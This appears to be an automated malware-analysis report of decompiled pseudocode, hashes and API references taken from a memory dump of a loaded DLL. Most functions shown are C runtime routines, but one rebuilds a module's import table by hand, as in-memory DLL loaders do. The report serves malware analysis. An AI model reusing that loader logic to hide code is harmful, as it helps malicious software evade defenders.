                                              Similarity
                                              • API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                              • String ID:
                                              • API String ID: 757573777-0
                                              • Opcode ID: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
                                              • Instruction ID: e938656deda60742f1fefc21b0672a3c59c014a575f1141aa0bdfd656c9da876
                                              • Opcode Fuzzy Hash: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
                                              • Instruction Fuzzy Hash: 3CF0BB76519B2229F654E7347C0369A3AC5DF097F1F300A26F464D50DDEF14E4518150
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 88%
                                              			E1000C468(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
                                              				signed int _v8;
                                              				char _v12;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				void* _t45;
                                              				signed int _t46;
                                              				signed int _t47;
                                              				signed int _t50;
                                              				signed int _t53;
                                              				signed int _t54;
                                              				signed int _t59;
                                              				void* _t64;
                                              				signed int _t66;
                                              				void* _t68;
                                              				signed int _t75;
                                              				signed int _t79;
                                              				signed short _t80;
                                              				signed int _t82;
                                              				void* _t83;
                                              				signed int _t90;
                                              				void* _t91;
                                              				signed int _t92;
                                              				signed int _t94;
                                              				signed int* _t97;
                                              
                                              				_t46 = E100076DE(_t45);
                                              				if(_t46 >= 0) {
                                              					_t97 = _a8;
                                              					_t47 = E100095F8(_t97);
                                              					_t79 = _t97[3];
                                              					_t94 = _t47;
                                              					__eflags = _t79 & 0x00000082;
                                              					if((_t79 & 0x00000082) != 0) {
                                              						__eflags = _t79 & 0x00000040;
                                              						if((_t79 & 0x00000040) == 0) {
                                              							_t75 = 0;
                                              							__eflags = _t79 & 0x00000001;
                                              							if((_t79 & 0x00000001) == 0) {
                                              								L10:
                                              								_t50 = _t97[3] & 0xffffffef | 0x00000002;
                                              								_t97[3] = _t50;
                                              								_t97[1] = _t75;
                                              								__eflags = _t50 & 0x0000010c;
                                              								if((_t50 & 0x0000010c) == 0) {
                                              									_t64 = E1000951C();
                                              									__eflags = _t97 - _t64 + 0x20;
                                              									if(_t97 == _t64 + 0x20) {
                                              										L13:
                                              										_t66 = E1000961C(_t94);
                                              										__eflags = _t66;
                                              										if(_t66 == 0) {
                                              											goto L14;
                                              										}
                                              									} else {
                                              										_t68 = E1000951C();
                                              										__eflags = _t97 - _t68 + 0x40;
                                              										if(_t97 != _t68 + 0x40) {
                                              											L14:
                                              											E1000A133(_t97);
                                              										} else {
                                              											goto L13;
                                              										}
                                              									}
                                              								}
                                              								__eflags = _t97[3] & 0x00000108;
                                              								if(__eflags == 0) {
                                              									_v12 = _a4;
                                              									_push(2);
                                              									_push( &_v12);
                                              									_push(_t94);
                                              									_v8 = 2;
                                              									_t53 = E10009680(_t75, _t91, _t94, _t97, __eflags);
                                              									_t80 = _a4;
                                              									_t75 = _t53;
                                              									goto L27;
                                              								} else {
                                              									_t92 = _t97[2];
                                              									 *_t97 = _t92 + 2;
                                              									_t82 =  *_t97 - _t92;
                                              									_v8 = _t82;
                                              									_t97[1] = _t97[6] - 2;
                                              									__eflags = _t82;
                                              									if(__eflags <= 0) {
                                              										__eflags = _t94 - 0xffffffff;
                                              										if(_t94 == 0xffffffff) {
                                              											L22:
                                              											_t83 = 0x10012340;
                                              										} else {
                                              											__eflags = _t94 - 0xfffffffe;
                                              											if(_t94 == 0xfffffffe) {
                                              												goto L22;
                                              											} else {
                                              												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t94 >> 5) * 4));
                                              											}
                                              										}
                                              										__eflags =  *(_t83 + 4) & 0x00000020;
                                              										if(__eflags == 0) {
                                              											goto L25;
                                              										} else {
                                              											_push(2);
                                              											_push(_t75);
                                              											_push(_t75);
                                              											_push(_t94);
                                              											_t59 = E10009FB9(_t75, _t94, _t97, __eflags);
                                              											__eflags = (_t59 & _t92) - 0xffffffff;
                                              											if((_t59 & _t92) == 0xffffffff) {
                                              												goto L28;
                                              											} else {
                                              												goto L25;
                                              											}
                                              										}
                                              									} else {
                                              										_push(_t82);
                                              										_push(_t92);
                                              										_push(_t94);
                                              										_t75 = E10009680(_t75, _t92, _t94, _t97, __eflags);
                                              										L25:
                                              										_t80 = _a4;
                                              										 *(_t97[2]) = _t80;
                                              										L27:
                                              										__eflags = _t75 - _v8;
                                              										if(_t75 == _v8) {
                                              											_t54 = _t80 & 0x0000ffff;
                                              										} else {
                                              											L28:
                                              											_t43 =  &(_t97[3]);
                                              											 *_t43 = _t97[3] | 0x00000020;
                                              											__eflags =  *_t43;
                                              											goto L29;
                                              										}
                                              									}
                                              								}
                                              							} else {
                                              								_t97[1] = 0;
                                              								__eflags = _t79 & 0x00000010;
                                              								if((_t79 & 0x00000010) == 0) {
                                              									_t97[3] = _t79 | 0x00000020;
                                              									L29:
                                              									_t54 = 0xffff;
                                              								} else {
                                              									_t90 = _t79 & 0xfffffffe;
                                              									__eflags = _t90;
                                              									 *_t97 = _t97[2];
                                              									_t97[3] = _t90;
                                              									goto L10;
                                              								}
                                              							}
                                              						} else {
                                              							 *((intOrPtr*)(E10005EC6())) = 0x22;
                                              							goto L6;
                                              						}
                                              					} else {
                                              						 *((intOrPtr*)(E10005EC6())) = 9;
                                              						L6:
                                              						_t97[3] = _t97[3] | 0x00000020;
                                              						_t54 = 0xffff;
                                              					}
                                              					return _t54;
                                              				} else {
                                              					return _t46 | 0xffffffff;
                                              				}
                                              			}

                                              APIs
                                              • __ioinit.LIBCMT ref: 1000C46D
                                                • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Once$ExecuteInit__ioinit
                                              • String ID:
                                              • API String ID: 129814473-0
                                              • Opcode ID: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
                                              • Instruction ID: 4d06972f43a844bfa3949195b83d417bb95582cf177f034ad1b947d460bfdcb6
                                              • Opcode Fuzzy Hash: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
                                              • Instruction Fuzzy Hash: B641E175500B099BF724CB68CC91E6A77E4EF453E1F10861DE8A6876D9E774FD808B10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 89%
                                              			E10005033(void* __eflags, signed char _a4, intOrPtr* _a8) {
                                              				signed int _v8;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				void* _t43;
                                              				signed int _t44;
                                              				signed int _t45;
                                              				signed int _t48;
                                              				signed int _t52;
                                              				void* _t60;
                                              				signed int _t62;
                                              				void* _t64;
                                              				signed int _t67;
                                              				signed int _t70;
                                              				signed int _t74;
                                              				signed int _t76;
                                              				void* _t77;
                                              				signed int _t85;
                                              				void* _t86;
                                              				signed int _t87;
                                              				signed int _t89;
                                              				intOrPtr* _t92;
                                              
                                              				_t44 = E100076DE(_t43);
                                              				if(_t44 >= 0) {
                                              					_t92 = _a8;
                                              					_t45 = E100095F8(_t92);
                                              					_t2 = _t92 + 0xc; // 0x66ce7cf0
                                              					_t74 =  *_t2;
                                              					_t89 = _t45;
                                              					__eflags = _t74 & 0x00000082;
                                              					if((_t74 & 0x00000082) != 0) {
                                              						__eflags = _t74 & 0x00000040;
                                              						if((_t74 & 0x00000040) == 0) {
                                              							_t70 = 0;
                                              							__eflags = _t74 & 0x00000001;
                                              							if((_t74 & 0x00000001) == 0) {
                                              								L10:
                                              								_t16 = _t92 + 0xc; // 0x66ce7cf0
                                              								_t48 =  *_t16 & 0xffffffef | 0x00000002;
                                              								 *(_t92 + 0xc) = _t48;
                                              								 *(_t92 + 4) = _t70;
                                              								__eflags = _t48 & 0x0000010c;
                                              								if((_t48 & 0x0000010c) == 0) {
                                              									_t60 = E1000951C();
                                              									__eflags = _t92 - _t60 + 0x20;
                                              									if(_t92 == _t60 + 0x20) {
                                              										L13:
                                              										_t62 = E1000961C(_t89);
                                              										__eflags = _t62;
                                              										if(_t62 == 0) {
                                              											goto L14;
                                              										}
                                              									} else {
                                              										_t64 = E1000951C();
                                              										__eflags = _t92 - _t64 + 0x40;
                                              										if(_t92 != _t64 + 0x40) {
                                              											L14:
                                              											E1000A133(_t92);
                                              										} else {
                                              											goto L13;
                                              										}
                                              									}
                                              								}
                                              								__eflags =  *(_t92 + 0xc) & 0x00000108;
                                              								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
                                              									__eflags = 1;
                                              									_push(1);
                                              									_v8 = 1;
                                              									_push( &_a4);
                                              									_push(_t89);
                                              									_t45 = E10009680(_t70, _t86, _t89, _t92, 1);
                                              									_t70 = _t45;
                                              									goto L27;
                                              								} else {
                                              									_t24 = _t92 + 8; // 0x753b46c6
                                              									_t87 =  *_t24;
                                              									_t25 = _t87 + 1; // 0x753b46c7
                                              									 *_t92 = _t25;
                                              									_t26 = _t92 + 0x18; // 0x8b0d78fe
                                              									_t76 =  *_t92 - _t87;
                                              									_v8 = _t76;
                                              									 *(_t92 + 4) =  *_t26 - 1;
                                              									__eflags = _t76;
                                              									if(__eflags <= 0) {
                                              										__eflags = _t89 - 0xffffffff;
                                              										if(_t89 == 0xffffffff) {
                                              											L22:
                                              											_t77 = 0x10012340;
                                              										} else {
                                              											__eflags = _t89 - 0xfffffffe;
                                              											if(_t89 == 0xfffffffe) {
                                              												goto L22;
                                              											} else {
                                              												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t89 >> 5) * 4));
                                              											}
                                              										}
                                              										__eflags =  *(_t77 + 4) & 0x00000020;
                                              										if(__eflags == 0) {
                                              											goto L25;
                                              										} else {
                                              											_push(2);
                                              											_push(_t70);
                                              											_push(_t70);
                                              											_push(_t89);
                                              											_t45 = E10009FB9(_t70, _t89, _t92, __eflags) & _t87;
                                              											__eflags = _t45 - 0xffffffff;
                                              											if(_t45 == 0xffffffff) {
                                              												goto L28;
                                              											} else {
                                              												goto L25;
                                              											}
                                              										}
                                              									} else {
                                              										_push(_t76);
                                              										_push(_t87);
                                              										_push(_t89);
                                              										_t70 = E10009680(_t70, _t87, _t89, _t92, __eflags);
                                              										L25:
                                              										_t35 = _t92 + 8; // 0x753b46c6
                                              										_t45 = _a4;
                                              										 *( *_t35) = _t45;
                                              										L27:
                                              										__eflags = _t70 - _v8;
                                              										if(_t70 == _v8) {
                                              											_t52 = _a4 & 0x000000ff;
                                              										} else {
                                              											L28:
                                              											_t40 = _t92 + 0xc;
                                              											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
                                              											__eflags =  *_t40;
                                              											goto L29;
                                              										}
                                              									}
                                              								}
                                              							} else {
                                              								 *(_t92 + 4) = 0;
                                              								__eflags = _t74 & 0x00000010;
                                              								if((_t74 & 0x00000010) == 0) {
                                              									 *(_t92 + 0xc) = _t74 | 0x00000020;
                                              									L29:
                                              									_t52 = _t45 | 0xffffffff;
                                              								} else {
                                              									_t14 = _t92 + 8; // 0x753b46c6
                                              									_t85 = _t74 & 0xfffffffe;
                                              									__eflags = _t85;
                                              									 *_t92 =  *_t14;
                                              									 *(_t92 + 0xc) = _t85;
                                              									goto L10;
                                              								}
                                              							}
                                              						} else {
                                              							_t67 = E10005EC6();
                                              							 *_t67 = 0x22;
                                              							goto L6;
                                              						}
                                              					} else {
                                              						_t67 = E10005EC6();
                                              						 *_t67 = 9;
                                              						L6:
                                              						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
                                              						_t52 = _t67 | 0xffffffff;
                                              					}
                                              					return _t52;
                                              				} else {
                                              					return _t44 | 0xffffffff;
                                              				}
                                              			}
                                              0x10005147
                                              0x10005148
                                              0x1000514e
                                              0x10005153
                                              0x10005156
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x10005156
                                              0x10005102
                                              0x10005102
                                              0x10005103
                                              0x10005104
                                              0x1000510d
                                              0x10005158
                                              0x10005158
                                              0x1000515b
                                              0x1000515e
                                              0x10005178
                                              0x10005178
                                              0x1000517b
                                              0x10005186
                                              0x1000517d
                                              0x1000517d
                                              0x1000517d
                                              0x1000517d
                                              0x1000517d
                                              0x00000000
                                              0x1000517d
                                              0x1000517b
                                              0x10005100
                                              0x1000508c
                                              0x1000508c
                                              0x1000508f
                                              0x10005092
                                              0x10005114
                                              0x10005181
                                              0x10005181
                                              0x10005094
                                              0x10005094
                                              0x10005097
                                              0x10005097
                                              0x1000509a
                                              0x1000509c
                                              0x00000000
                                              0x1000509c
                                              0x10005092
                                              0x1000506d
                                              0x1000506d
                                              0x10005072
                                              0x00000000
                                              0x10005072
                                              0x1000505b
                                              0x1000505b
                                              0x10005060
                                              0x10005078
                                              0x10005078
                                              0x1000507c
                                              0x1000507c
                                              0x1000518e
                                              0x10005040
                                              0x10005044
                                              0x10005044

                                              APIs
                                              • __ioinit.LIBCMT ref: 10005037
                                                • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Once$ExecuteInit__ioinit
                                              • String ID:
                                              • API String ID: 129814473-0
                                              • Opcode ID: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
                                              • Instruction ID: 32086827ce60b9a2cbb99d25a0e80922b058c4e771a23cab2cd98d30bef894a1
                                              • Opcode Fuzzy Hash: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
                                              • Instruction Fuzzy Hash: 4A41F171900B059FF324CF68C851BAB77E4DF453E2B10871DE8B6C62D9E676E9408B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 90%
                                              			E10004A66(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                              				char* _v16;
                                              				char _v28;
                                              				signed char _v32;
                                              				void* _t10;
                                              				void* _t19;
                                              				intOrPtr* _t22;
                                              				void* _t24;
                                              				void* _t25;
                                              				intOrPtr* _t27;
                                              
                                              				_t25 = __edi;
                                              				_t24 = __edx;
                                              				_t19 = __ebx;
                                              				while(1) {
                                              					_t10 = E10008E67(_t19, _t24, _t25, _a4);
                                              					if(_t10 != 0) {
                                              						break;
                                              					}
                                              					if(E10009026(_t10, _a4) == 0) {
                                              						_push(1);
                                              						_t22 =  &_v28;
                                              						_v16 = "bad allocation";
                                              						E10008F1E(_t22,  &_v16);
                                              						_v28 = 0x1000e460;
                                              						E10009059( &_v28, 0x10010b04);
                                              						asm("int3");
                                              						_t27 = _t22;
                                              						 *_t27 = 0x1000e460;
                                              						E10008F5C(_t22);
                                              						if((_v32 & 0x00000001) != 0) {
                                              							L10003800(_t27);
                                              						}
                                              						return _t27;
                                              					} else {
                                              						continue;
                                              					}
                                              					L7:
                                              				}
                                              				return _t10;
                                              				goto L7;
                                              			}













                                              APIs
                                              • _malloc.LIBCMT ref: 10004A7E
                                                • Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
                                                • Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
                                                • Part of subcall function 10008E67: HeapAlloc.KERNEL32(00480000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA
                                              • std::exception::exception.LIBCMT ref: 10004A9A
                                              • __CxxThrowException@8.LIBCMT ref: 10004AAF
                                                • Part of subcall function 10009059: RaiseException.KERNEL32(?,?,?,10010B04,?,?,?,10004AB4,?,10010B04,00000000,00000001), ref: 100090AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                              • String ID: `$h
                                              • API String ID: 1059622496-773005782
                                              • Opcode ID: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
                                              • Instruction ID: ad3e8221741d280e2df0066782729e531edcb1fd3c4a4238d597797a5e5b62a6
                                              • Opcode Fuzzy Hash: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
                                              • Instruction Fuzzy Hash: C2F028B550024D6AFB00DBA8DC01ADF77ACEF023C4F114426F900A2149CFB1AA4087AA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E1000B39B(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                              				void* _t7;
                                              				void* _t8;
                                              				intOrPtr* _t9;
                                              				intOrPtr* _t12;
                                              				void* _t20;
                                              				long _t31;
                                              
                                              				if(_a4 != 0) {
                                              					_t31 = _a8;
                                              					if(_t31 != 0) {
                                              						_push(__ebx);
                                              						while(_t31 <= 0xffffffe0) {
                                              							if(_t31 == 0) {
                                              								_t31 = _t31 + 1;
                                              							}
                                              							_t7 = HeapReAlloc( *0x100132fc, 0, _a4, _t31);
                                              							_t20 = _t7;
                                              							if(_t20 != 0) {
                                              								L17:
                                              								_t8 = _t20;
                                              							} else {
                                              								if( *0x10013c2c == _t7) {
                                              									_t9 = E10005EC6();
                                              									 *_t9 = E10005ED9(GetLastError());
                                              									goto L17;
                                              								} else {
                                              									if(E10009026(_t7, _t31) == 0) {
                                              										_t12 = E10005EC6();
                                              										 *_t12 = E10005ED9(GetLastError());
                                              										L12:
                                              										_t8 = 0;
                                              									} else {
                                              										continue;
                                              									}
                                              								}
                                              							}
                                              							goto L14;
                                              						}
                                              						E10009026(_t6, _t31);
                                              						 *((intOrPtr*)(E10005EC6())) = 0xc;
                                              						goto L12;
                                              					} else {
                                              						E10004732(_a4);
                                              						_t8 = 0;
                                              					}
                                              					L14:
                                              					return _t8;
                                              				} else {
                                              					return E10008E67(__ebx, __edx, __edi, _a8);
                                              				}
                                              			}










                                              APIs
                                              • _malloc.LIBCMT ref: 1000B3A7
                                                • Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
                                                • Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
                                                • Part of subcall function 10008E67: HeapAlloc.KERNEL32(00480000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA
                                              • _free.LIBCMT ref: 1000B3BA
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: AllocHeap_free_malloc
                                              • String ID:
                                              • API String ID: 2734353464-0
                                              • Opcode ID: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
                                              • Instruction ID: 18c43e679c10c76ba13cd9b028f176d48a0d2f42c637b465b0a36ca5614664b7
                                              • Opcode Fuzzy Hash: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
                                              • Instruction Fuzzy Hash: AD11E031404616AFFB24EF74DC4564F3BD4DF042E1F218425F9489A15ADB31DE409750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E1000883C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                              				LONG* _t20;
                                              				signed int _t25;
                                              				void* _t29;
                                              				void* _t31;
                                              				LONG* _t33;
                                              				void* _t34;
                                              
                                              				_t29 = __edx;
                                              				_t24 = __ebx;
                                              				_push(0xc);
                                              				_push(0x10010da8);
                                              				E10008040(__ebx, __edi, __esi);
                                              				_t31 = E10006087();
                                              				_t25 =  *0x10012ae4; // 0xfffffffe
                                              				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                              					E100091AB(0xd);
                                              					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                              					_t33 =  *(_t31 + 0x68);
                                              					 *(_t34 - 0x1c) = _t33;
                                              					__eflags = _t33 -  *0x10012394; // 0x10012690
                                              					if(__eflags != 0) {
                                              						__eflags = _t33;
                                              						if(__eflags != 0) {
                                              							__eflags = InterlockedDecrement(_t33);
                                              							if(__eflags == 0) {
                                              								__eflags = _t33 - 0x10012690;
                                              								if(__eflags != 0) {
                                              									E10004732(_t33);
                                              								}
                                              							}
                                              						}
                                              						_t20 =  *0x10012394; // 0x10012690
                                              						 *(_t31 + 0x68) = _t20;
                                              						_t33 =  *0x10012394; // 0x10012690
                                              						 *(_t34 - 0x1c) = _t33;
                                              						InterlockedIncrement(_t33);
                                              					}
                                              					 *(_t34 - 4) = 0xfffffffe;
                                              					E100088D8();
                                              				} else {
                                              					_t33 =  *(_t31 + 0x68);
                                              				}
                                              				_t38 = _t33;
                                              				if(_t33 == 0) {
                                              					E1000743E(_t24, _t29, _t31, _t33, _t38, 0x20);
                                              				}
                                              				return E10008085(_t33);
                                              			}










                                              APIs
                                                • Part of subcall function 10006087: __getptd_noexit.LIBCMT ref: 10006088
                                                • Part of subcall function 10006087: __amsg_exit.LIBCMT ref: 10006095
                                              • __amsg_exit.LIBCMT ref: 10008869
                                              • __lock.LIBCMT ref: 10008879
                                              • InterlockedDecrement.KERNEL32(?), ref: 10008896
                                              • _free.LIBCMT ref: 100088A9
                                              • InterlockedIncrement.KERNEL32(10012690), ref: 100088C1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                              • String ID:
                                              • API String ID: 1231874560-0
                                              • Opcode ID: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
                                              • Instruction ID: 6fa5c55f02b032b9b52f9637cbc65706c3d9556ef65a5339b15ab8c9acf7f00e
                                              • Opcode Fuzzy Hash: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
                                              • Instruction Fuzzy Hash: 7901C075A016219BFB44EB64888578E77A0FF047D4F51800AE9886768CCF38AB91CFD2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 48%
                                              			E10001470(void* __ecx, intOrPtr* _a4) {
                                              				intOrPtr _v8;
                                              				void* _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _t44;
                                              				signed short _t56;
                                              				signed int _t58;
                                              				intOrPtr _t60;
                                              				intOrPtr _t64;
                                              				intOrPtr _t65;
                                              				void* _t67;
                                              				intOrPtr* _t68;
                                              				intOrPtr _t70;
                                              				void _t71;
                                              				signed short* _t72;
                                              				intOrPtr _t73;
                                              				intOrPtr _t77;
                                              				intOrPtr* _t78;
                                              				intOrPtr _t79;
                                              				intOrPtr _t80;
                                              				signed short* _t82;
                                              				void* _t84;
                                              				void* _t85;
                                              
                                              				_t78 = _a4;
                                              				_t65 =  *_t78;
                                              				_t2 = _t78 + 4; // 0x4d8d5010
                                              				_t79 =  *_t2;
                                              				_a4 = _t79;
                                              				if( *((intOrPtr*)(_t65 + 0x84)) == 0) {
                                              					L22:
                                              					return 1;
                                              				} else {
                                              					_t67 =  *((intOrPtr*)(_t65 + 0x80)) + _t79;
                                              					_v12 = _t67;
                                              					if(IsBadReadPtr(_t67, 0x14) == 0) {
                                              						while(1) {
                                              							_t44 =  *((intOrPtr*)(_t67 + 0xc));
                                              							if(_t44 == 0) {
                                              								goto L22;
                                              							}
                                              							_t8 = _t78 + 0x28; // 0x12f7805
                                              							_t9 = _t78 + 0x1c; // 0xe58b0000
                                              							_t80 =  *((intOrPtr*)( *_t9))(_t44 + _t79,  *_t8);
                                              							_t85 = _t84 + 8;
                                              							_v8 = _t80;
                                              							if(_t80 == 0) {
                                              								SetLastError(0x7e);
                                              								return 0;
                                              							} else {
                                              								_t11 = _t78 + 0xc; // 0xd0ff0000
                                              								_t14 = _t78 + 8; // 0x637e8ef
                                              								_t70 = E10001DD0( *_t14, 4 +  *_t11 * 4);
                                              								_t84 = _t85 + 8;
                                              								if(_t70 == 0) {
                                              									_t40 = _t78 + 0x28; // 0x12f7805
                                              									_t41 = _t78 + 0x24; // 0x39c033cc
                                              									 *((intOrPtr*)( *_t41))(_t80,  *_t40);
                                              									SetLastError(0xe);
                                              									return 0;
                                              								} else {
                                              									_t15 = _t78 + 0xc; // 0xd0ff0000
                                              									 *((intOrPtr*)(_t78 + 8)) = _t70;
                                              									_t77 = _t80;
                                              									 *((intOrPtr*)(_t70 +  *_t15 * 4)) = _t77;
                                              									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
                                              									_t71 =  *_t67;
                                              									if(_t71 == 0) {
                                              										_t82 =  *((intOrPtr*)(_t67 + 0x10)) + _a4;
                                              										_t72 = _t82;
                                              									} else {
                                              										_t64 = _a4;
                                              										_t82 = _t71 + _t64;
                                              										_t72 =  *((intOrPtr*)(_t67 + 0x10)) + _t64;
                                              									}
                                              									_t56 =  *_t82;
                                              									if(_t56 == 0) {
                                              										L17:
                                              										_t67 = _t67 + 0x14;
                                              										_v12 = _t67;
                                              										if(IsBadReadPtr(_t67, 0x14) != 0) {
                                              											goto L22;
                                              										} else {
                                              											_t79 = _a4;
                                              											continue;
                                              										}
                                              									} else {
                                              										_t73 = _t72 - _t82;
                                              										_v16 = _t73;
                                              										while(1) {
                                              											_t27 = _t78 + 0x28; // 0x12f7805
                                              											_push( *_t27);
                                              											_t68 = _t73 + _t82;
                                              											if(_t56 >= 0) {
                                              												_t58 = _t56 + _a4 + 2;
                                              											} else {
                                              												_t58 = _t56 & 0x0000ffff;
                                              											}
                                              											_t30 = _t78 + 0x20; // 0xccccc35d
                                              											_t60 =  *((intOrPtr*)( *_t30))(_t77, _t58);
                                              											_t84 = _t84 + 0xc;
                                              											 *_t68 = _t60;
                                              											if(_t60 == 0) {
                                              												break;
                                              											}
                                              											_t56 = _t82[2];
                                              											_t73 = _v16;
                                              											_t77 = _v8;
                                              											_t82 =  &(_t82[2]);
                                              											if(_t56 != 0) {
                                              												continue;
                                              											} else {
                                              												_t67 = _v12;
                                              												goto L17;
                                              											}
                                              											goto L23;
                                              										}
                                              										_t37 = _t78 + 0x28; // 0x12f7805
                                              										_t39 = _t78 + 0x24; // 0x39c033cc
                                              										 *((intOrPtr*)( *_t39))(_v8,  *_t37);
                                              										SetLastError(0x7f);
                                              										return 0;
                                              									}
                                              								}
                                              							}
                                              							goto L23;
                                              						}
                                              					}
                                              					goto L22;
                                              				}
                                              				L23:
                                              			}

                                              APIs
                                              • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000000,100013CB), ref: 1000149F
                                              • SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100015C8
                                                • Part of subcall function 10001DD0: VirtualQuery.KERNEL32(0637E8EF,?,0000001C,100013CB,00000000,?,?,?,?,?,100014E9,0637E8EF,D0FF0000), ref: 10001DEA
                                              • IsBadReadPtr.KERNEL32(?,00000014,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80), ref: 10001573
                                              • SetLastError.KERNEL32(0000007F), ref: 10001596
                                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB), ref: 100015B5
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
